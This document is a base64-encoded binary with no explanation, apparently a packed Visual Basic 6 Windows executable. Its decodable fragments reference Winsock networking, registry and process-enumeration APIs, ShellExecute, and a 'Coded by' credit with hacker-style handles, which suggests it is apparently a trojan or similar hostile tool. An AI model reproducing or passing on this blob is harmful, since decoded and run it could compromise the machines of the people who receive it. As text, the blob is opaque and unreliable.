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
